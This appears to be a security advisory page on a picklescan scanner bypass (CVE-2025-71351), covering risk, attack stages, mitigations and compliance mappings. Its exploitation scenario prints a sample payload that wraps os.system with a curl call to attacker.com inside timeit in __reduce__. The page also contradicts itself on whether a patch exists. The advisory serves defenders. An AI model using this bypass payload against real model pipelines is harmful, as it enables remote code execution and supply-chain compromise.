CVE-2025-71351: picklescan scanner bypass enables RCE

CISO Take

picklescan before version 0.0.25 contains an incomplete blocklist (CWE-184) that fails to flag malicious pickle files crafted with `timeit.timeit()` inside a `__reduce__` method — a technique that lets attackers import `os` and execute arbitrary system commands while appearing clean to the scanner. Organizations relying on picklescan as a security gate before loading ML models from external sources — model hubs, partner feeds, CI/CD pipelines — now face a false sense of protection: the scanner gives a green light, and the payload detonates on `pickle.load()`. Although there is no public exploit and EPSS data is not yet available, the attack requires only moderate skill (knowledge of pickle internals and scanner logic), the package carries a risk score of 53/100 with 73 prior CVEs, and supply-chain model poisoning is a proven vector against AI/ML teams. Patch to picklescan 0.0.25 immediately; supplement with fickling for defense-in-depth, and consider migrating model serialization to safetensors where possible.

Sources: NVD GitHub Advisory VulnCheck ATLAS

What is the risk?

High. The vulnerability is a defense evasion bypass in a security control, not in a model-serving library itself — the blast radius scales with every organization that trusts picklescan as its primary gate against malicious models. Exploitation requires no elevated privileges and no network access beyond delivering the crafted file; once the file passes the scanner it executes on any `pickle.load()` call. EPSS and KEV data are absent at publication time, but the technique is straightforward for an attacker with pickle serialization knowledge. The 3 direct downstream dependents understate risk — picklescan is commonly integrated directly into CI/CD scripts and pre-load hooks rather than as a library import.

How does the attack unfold?

Craft Malicious Artifact

Attacker creates a pickle file where __reduce__ calls timeit.timeit() wrapping os.system(), a pattern not matched by picklescan's blocklist.

AML.T0011.000

Evade Security Scanner

The crafted file is submitted to a picklescan-protected pipeline; the scanner returns a clean result due to the incomplete blocklist (CWE-184).

AML.T0107

Deliver via Supply Chain

The 'clean' model file is accepted into the model registry, CI/CD artifact store, or downstream system as a trusted artifact.

AML.T0010.001

Remote Code Execution

When the model is loaded via pickle.load(), the timeit wrapper executes the embedded OS command, granting the attacker shell access on the pipeline host.

AML.T0018.002

Craft Malicious Artifact

Attacker creates a pickle file where __reduce__ calls timeit.timeit() wrapping os.system(), a pattern not matched by picklescan's blocklist.

AML.T0011.000

Evade Security Scanner

The crafted file is submitted to a picklescan-protected pipeline; the scanner returns a clean result due to the incomplete blocklist (CWE-184).

AML.T0107

Deliver via Supply Chain

The 'clean' model file is accepted into the model registry, CI/CD artifact store, or downstream system as a trusted artifact.

AML.T0010.001

Remote Code Execution

When the model is loaded via pickle.load(), the timeit wrapper executes the embedded OS command, granting the attacker shell access on the pipeline host.

AML.T0018.002

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
picklescan	pip	—	No patch
413 3 dependents Pushed 1mo ago 77% patched ~12d to patch Full package profile →

Do you use picklescan? You're affected.

How severe is it?

CVSS 3.1

N/A

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Moderate

What should I do?

5 steps

Patch: upgrade picklescan to 0.0.25 or later immediately — the vendor advisory confirms the fix is available.
Defense-in-depth: deploy fickling (also in your tracked packages) alongside or as a replacement; fickling performs static AST-level analysis rather than pattern matching, making it harder to bypass via opcode aliasing.
Migration: shift model serialization to safetensors format (tracked package) where supported — it is not executable and eliminates the pickle RCE class entirely.
Detection: audit CI/CD logs for any model files that passed picklescan scans in the last 90 days (prior to the 0.0.25 patch); treat any externally sourced pickle file loaded in that window as potentially untrusted.
Sandbox: run pickle.load() in an isolated subprocess or container with no network access and minimal filesystem permissions as a compensating control during the patch window.

How is it classified?

Supply Chain Code Execution Model Framework AML.T0010.001 - AI Software AML.T0011.000 - Unsafe AI Artifacts AML.T0018.002 - Embed Malware AML.T0107 - Exploitation for Defense Evasion

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.6.2.6 - AI system tools and infrastructure

NIST AI RMF

GOVERN 6.1 - AI supply chain risk management policies

OWASP LLM Top 10

LLM05:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2025-71351?

picklescan before version 0.0.25 contains an incomplete blocklist (CWE-184) that fails to flag malicious pickle files crafted with `timeit.timeit()` inside a `__reduce__` method — a technique that lets attackers import `os` and execute arbitrary system commands while appearing clean to the scanner. Organizations relying on picklescan as a security gate before loading ML models from external sources — model hubs, partner feeds, CI/CD pipelines — now face a false sense of protection: the scanner gives a green light, and the payload detonates on `pickle.load()`. Although there is no public exploit and EPSS data is not yet available, the attack requires only moderate skill (knowledge of pickle internals and scanner logic), the package carries a risk score of 53/100 with 73 prior CVEs, and supply-chain model poisoning is a proven vector against AI/ML teams. Patch to picklescan 0.0.25 immediately; supplement with fickling for defense-in-depth, and consider migrating model serialization to safetensors where possible.

Is CVE-2025-71351 actively exploited?

No confirmed active exploitation of CVE-2025-71351 has been reported, but organizations should still patch proactively.

How to fix CVE-2025-71351?

1. Patch: upgrade picklescan to 0.0.25 or later immediately — the vendor advisory confirms the fix is available. 2. Defense-in-depth: deploy fickling (also in your tracked packages) alongside or as a replacement; fickling performs static AST-level analysis rather than pattern matching, making it harder to bypass via opcode aliasing. 3. Migration: shift model serialization to safetensors format (tracked package) where supported — it is not executable and eliminates the pickle RCE class entirely. 4. Detection: audit CI/CD logs for any model files that passed picklescan scans in the last 90 days (prior to the 0.0.25 patch); treat any externally sourced pickle file loaded in that window as potentially untrusted. 5. Sandbox: run `pickle.load()` in an isolated subprocess or container with no network access and minimal filesystem permissions as a compensating control during the patch window.

What systems are affected by CVE-2025-71351?

This vulnerability affects the following AI/ML architecture patterns: ML model repositories and registries, Training pipelines, Model serving, AI/ML CI/CD pipelines, Agent frameworks with tool/model loading.

What is the CVSS score for CVE-2025-71351?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

ML model repositories and registriesTraining pipelinesModel servingAI/ML CI/CD pipelinesAgent frameworks with tool/model loading

MITRE ATLAS Techniques

AML.T0010.001 AI Software

AML.T0011.000 Unsafe AI Artifacts

AML.T0018.002 Embed Malware

AML.T0107 Exploitation for Defense Evasion

Compliance Controls Affected

EU AI Act: Article 15

ISO 42001: A.6.2.6

NIST AI RMF: GOVERN 6.1

OWASP LLM Top 10: LLM05:2025

What are the technical details?

Original Advisory

picklescan before 0.0.25 fails to detect malicious pickle files that use timeit.timeit() in the __reduce__ method, allowing remote code execution. Attackers can craft pickle files that import dangerous libraries like os and execute arbitrary system commands, which evade picklescan detection and execute when pickle.load() is called.

Exploitation Scenario

An attacker targeting an ML team's model ingestion pipeline identifies that the organization uses picklescan to vet community models before loading. They craft a seemingly legitimate fine-tuned model file where the serialized object's `__reduce__` method calls `timeit.timeit('import os; os.system("curl attacker.com/beacon")', number=1)` — a construct that picklescan's pattern-based blocklist does not flag. The attacker publishes this model to a public hub or submits it via a partner channel. The CI/CD pipeline runs picklescan, receives a clean result, and proceeds to load the model. On `pickle.load()`, the timeit wrapper executes, spawning an OS shell command that could install a reverse shell, exfiltrate training data, or pivot to adjacent cluster nodes via available credentials.

Weaknesses (CWE)

CWE-184 Incomplete List of Disallowed Inputs

CWE-184 — Incomplete List of Disallowed Inputs: The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete.

[Implementation] Do not rely exclusively on detecting disallowed inputs. There are too many variants to encode a character, especially when different environments are used, so there is a high likelihood of missing some variants. Only use detection of disallowed inputs as a mechanism for detecting suspicious activity. Ensure that you are using other protection mechanisms that only identify "good" input - such as lists of allowed inputs - and ensure that you are properly encoding your outputs.

Source: MITRE CWE corpus.